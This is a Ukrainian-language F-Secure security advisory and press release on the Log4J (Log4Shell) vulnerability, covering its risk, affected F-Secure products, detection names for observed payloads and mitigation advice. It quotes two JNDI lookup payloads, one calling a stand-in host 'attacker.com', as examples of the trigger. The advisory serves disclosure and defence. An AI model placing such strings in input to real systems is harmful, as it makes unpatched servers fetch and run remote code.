Уразливість у бібліотеці Log4J, виявлена в п’ятницю, 10 грудня, стрясає виробників програмного забезпечення та постачальників послуг у всьому світі. Уразливість у стандартизованому методі обробки журнальних повідомлень у програмному забезпеченні від Microsoft Minecraft до платформ електронної комерції вже піддається атакам зловмисників.
Майже неможливо описати рівень ризику, який зараз становлять уразливі програми. Якщо контрольований користувачем рядок символів, націлених на вразливість, реєструється, уразливість можна запустити віддалено. Простіше кажучи, зловмисник може використати цю вразливість, щоб обманом змусити цільову систему отримати та виконати код із віддаленого місця. На другому кроці зловмисник вирішує, що повинен робити шкідливий код.
«Майже ідеальний шторм»
Ця вразливість показує, наскільки важко захистити корпоративне програмне забезпечення на багатьох рівнях. Застаріле програмне забезпечення, включно зі старішими версіями Java, змушує багато компаній розробляти власні виправлення або не дозволяє їм негайно встановлювати їх. Ще одна складність виникає через проблему виправлення можливостей журналювання Log4j у режимі реального часу, саме тоді, коли загроза атак настільки висока, а журналювання настільки важливо.
Усі рекомендовані контрзаходи мають бути впроваджені «негайно», пише Агентство кібербезпеки та безпеки інфраструктури у своєму блозі.
Окремі користувачі можуть мало що робити, окрім встановлення оновлень для різних онлайн-сервісів, щойно вони стануть доступними. І це має статися негайно. Компанії та підприємства безперервно працюватимуть над розгортанням виправлень, одночасно захищаючи власні системи. Після цього буде важливо визначити, чи відбувається активний інцидент безпеки в уражених системах.
Уразливі місця майже всюди
Може бути важче знайти програму, яка не використовує бібліотеку Log4J, ніж ту, яка її використовує. Така повсюдність означає, що зловмисники можуть шукати вразливі місця практично скрізь.
«Будь ласка, змініть назву свого Tesla або iPhone НЕ у ${jndi:ldap://url/a}, якщо вам не потрібна несподівана подія», – каже Ерка Койвунен, директор з інформаційної безпеки F-Secure, жартома.
Використання мови форматування Log4J може викликати зловмисне програмне забезпечення в уразливих програмах. Як ми знаємо, одна лише згадка такої фрази, як ${jndi:ldap://attacker.com/pwnyourserver} у чаті Minecraft, наприклад, може спровокувати бурю безпеки в Microsoft у невиправленій системі.
Чи це впливає на продукти F-Secure?
Компанія F-Secure визначила, що ця вразливість уражена такими продуктами:
- Менеджер політики F-Secure
- F-Secure Policy Manager Proxy
- F-Secure Endpoint Proxy
- Роз'єм F-Secure Elements
Це впливає на версії цих продуктів як для Windows, так і для Linux, і їх слід негайно виправити.
Як я можу виправити свій продукт F-Secure?
Ми розробили виправлення безпеки для цієї вразливості. Новини та оновлення про цю вразливість постійно публікуються на сторінці нашої спільноти
Який захист пропонує F-Secure від цієї вразливості?
F-Secure Endpoint Protection (EPP) постійно оновлюється виявленнями для останніх локальних файлів експлойтів, але, враховуючи багато способів використання вразливості, це покриває лише частину проблеми.
Виявлення EPP, як зазвичай, стосується будь-якого корисного навантаження, поміченого на етапі після експлуатації. На момент написання цієї статті F-Secure здійснив такі виявлення, які стосуються деяких серйозних сценаріїв атак. Це зловмисне корисне навантаження, яке ми спостерігали у зв’язку з експлойтами Log4j.
- TR/Drop.Cobacis.AL
- TR/Rozena.wrdej
- TR/PShell.Agent.SWR
- TR/Coblat.G1
- TR/AD.MeterpreterSC.rywng
Багато з цих виявлень були доступні у F-Secure EPP протягом кількох місяців, що означає, що клієнти проактивно захищені від цих корисних навантажень.
Інші наявні засоби виявлення також можуть бути корисними, оскільки існує кілька способів скористатися експлойтом. Цей список корисних виявлень постійно оновлюватиметься в міру розвитку ситуації. Перегляньте загальні рекомендації в наступному розділі, щоб дізнатися про додаткові заходи щодо виправлення.
Загалом, які дії слід виконувати з будь-яким програмним забезпеченням, незалежно від виробника?
- Обмежте доступ до мережі або обмежте його надійними сайтами. Якщо ваша система не може підключитися до Інтернету, щоб отримати шкідливий код, атака не вдасться.
- Регулярно перевіряйте у постачальників інформацію про виправлення та інші виправлення вразливостей безпеки.
- F-Secure Elements Vulnerability Management може допомогти виявити вразливі системи.
- Продукти F-Secure Elements Endpoint Protection або F-Secure Business Suite можуть виявляти та виправляти вразливе програмне забезпечення в системі, де вони встановлені.
F-Secure також забезпечує постійну підтримку всіх клієнтів і користувачів.
Більше на F-Secure.com
Про F-Secure Ніхто не має кращого уявлення про справжні кібератаки, ніж F-Secure. Ми долаємо розрив між виявленням і відповіддю. Для цього ми використовуємо неперевершений досвід сотень найкращих технічних консультантів нашої галузі щодо загроз, дані з мільйонів пристроїв, на яких працює наше відзначене нагородами програмне забезпечення, а також постійні інновації у сфері штучного інтелекту. Провідні банки, авіакомпанії та корпорації довіряють нашій відданості боротьбі з найнебезпечнішими кіберзагрозами світу. Разом із нашою мережею провідних партнерів і понад 200 постачальниками послуг, наша місія полягає в тому, щоб надати всім нашим клієнтам кібербезпеку корпоративного рівня, адаптовану до їхніх потреб. Компанія F-Secure, заснована в 1988 році, зареєстрована на NASDAQ OMX Helsinki Ltd.